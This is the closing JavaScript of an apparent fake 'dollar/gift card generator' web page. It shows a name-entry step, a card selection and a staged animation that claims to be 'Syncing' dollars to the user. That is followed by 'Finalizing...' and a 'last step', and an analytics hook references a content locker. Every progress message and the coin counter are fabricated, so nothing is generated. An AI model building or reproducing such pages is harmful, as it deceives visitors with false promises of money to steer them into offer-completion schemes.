      document.getElementById("cardname1").style.fontWeight="100";
      document.getElementById("card1").style.boxShadow="0 0 0px 0px #000000b5";
  document.getElementById("card2").style.borderColor="#60605f14";
  document.getElementById("cardname2").style.fontWeight="100";
      document.getElementById("card2").style.boxShadow="0 0 0px 0px #000000b5";
  document.getElementById("card3").style.borderColor="#60605f14";
  document.getElementById("cardname3").style.fontWeight="100";
      document.getElementById("card3").style.boxShadow="0 0 0px 0px #000000b5";
  document.getElementById("card4").style.borderColor="#60605f14";
  document.getElementById("cardname4").style.fontWeight="100";
      document.getElementById("card4").style.boxShadow="0 0 0px 0px #000000b5";

  document.getElementById("cardlogo1").classList.remove("zoomin");
  document.getElementById("cardlogo2").classList.remove("zoomin");
  document.getElementById("cardlogo3").classList.remove("zoomin");
  document.getElementById("cardlogo4").classList.remove("zoomin");
  document.getElementById("cardlogo1").classList.remove("zoomout");
  document.getElementById("cardlogo2").classList.remove("zoomout");
  document.getElementById("cardlogo3").classList.remove("zoomout");
  document.getElementById("cardlogo4").classList.remove("zoomout");
  document.getElementById("cardlogo"+cardnum).classList.add("zoomout");
  document.getElementById("card"+cardnum).style.borderColor="#f23f3f";
    document.getElementById("cardname"+cardnum).style.fontWeight="600";
    document.getElementById("card"+cardnum).style.boxShadow="0 0 5px 0px #000000b5";
  cardclicked=cardnum;



}

function cardOver(cardnum){
  if (cardclicked!=cardnum){

    document.getElementById("cardlogo"+cardnum).classList.add("zoomout");
      document.getElementById("cardlogo"+cardnum).classList.remove("zoomin");
    }
}
function cardOut(cardnum){
    if (cardclicked!=cardnum){

      document.getElementById("cardlogo"+cardnum).classList.remove("zoomout");
    document.getElementById("cardlogo"+cardnum).classList.add("zoomin");
  }
}

function proceed(){
audioclick.play();
name=document.getElementById("uid").value;
if (name==""){

document.getElementById("input-form").classList.add("sakeanimation");
setTimeout(function(){
document.getElementById("input-form").classList.remove("sakeanimation");
},500);

}else{
  audioclick.play();
  document.getElementById("text-name").innerHTML="#"+ name;
    document.getElementById("step1").classList.add("hidein");
    setTimeout(function(){
          document.getElementById("step1").style.height="0px";
  document.getElementById("data2").style.display="block";
  setTimeout(function(){
    document.getElementById("data2").classList.remove("showin");
    document.getElementById("data2").classList.add("hidein");
  setTimeout(function(){
    audiosuccess.play();
    document.getElementById("step3").style.display="block";

    setTimeout(function(){
      document.getElementById("content").classList.add("slit-out-vertical");
    setTimeout(function(){
      document.getElementById("content2").style.display="block";
      document.getElementById("content").style.height="0px";
      document.getElementById("content").style.padding="0px";
        document.getElementById("content").style.margin="0px";
            }, 1000);
    }, 1200);

  }, 1000);
}, 4000);
      }, 1000);

}

}

function proceed2(){
  audioclick.play();
  document.getElementById("content2").classList.remove("showin");
    document.getElementById("content2").classList.add("hidein");
      setTimeout(function(){
        document.getElementById("content2").style.display="none";
        document.getElementById("content3").style.display="block";
        setTimeout(function(){
        document.getElementById("loading-step").innerHTML="Getting ready...";
        document.getElementById("pro-bar").classList.add("pro10");
        setTimeout(function(){
        document.getElementById("loading-step").innerHTML='Syncing <span style="font-size: 24px;font-weight: 900;color:#0364ee">'+cardvalue+'</span> Dollars for <span style="font-size: 24px;font-weight: 900;color:#0364ee">' + name +'</span>' ;
        document.getElementById("coinamount").innerHTML=cardvalue;
        document.getElementById("NameLastStep").innerHTML=name;
        document.getElementById("pro-bar").classList.add("pro10to20");
document.getElementById("content4").style.display="block";
window.scrollBy(0, 200);
var coin=0;
var myVar2 = setInterval(UserTimer, 1);
        function UserTimer() {

document.getElementById("gen-coin").innerHTML=Math.floor(coin);
document.getElementById("pro-bar2").classList.add("pro0To100");
audiopoinrunning.play();
coin=coin+(cardvalue/1000);
if (coin>=cardvalue){
  document.getElementById("gen-coin").innerHTML=Math.floor(cardvalue);
  clearInterval(myVar2);
  document.getElementById("content4").classList.remove("showin");
  document.getElementById("content4").classList.add("hidein");

  window.scrollBy(0, -200);

        setTimeout(function(){
            document.getElementById("content4").style.display="none";
          document.getElementById("loading-step").innerHTML="Finalizing...";
          document.getElementById("pro-bar").classList.add("pro20to70");

          setTimeout(function(){
            document.getElementById("loading-step").innerHTML="Loading last step...";
            document.getElementById("pro-bar").classList.add("pro70to94");

            setTimeout(function(){
              document.getElementById("content3").classList.remove("showin");
              document.getElementById("content3").classList.add("hidein");

              setTimeout(function(){
document.getElementById("content3").style.display="none";
                document.getElementById("content5").style.display="block";

              },1000);

            },1000);


          },2000);
        },4000);

}
        }


      },2000);
        },1000);

      },1000);

}

</script>
<script>
    if(typeof window.ga === 'function'){
        ga('create', 'UA-85922709-2', 'auto', 'customTemplateGlobal');
        ga('customTemplateGlobal.set', 'dimension1', typeof window.CPBContentLocker === 'function' ? 0 : 1);
        ga('customTemplateGlobal.send', 'pageView');
    }


</script>


</body></html>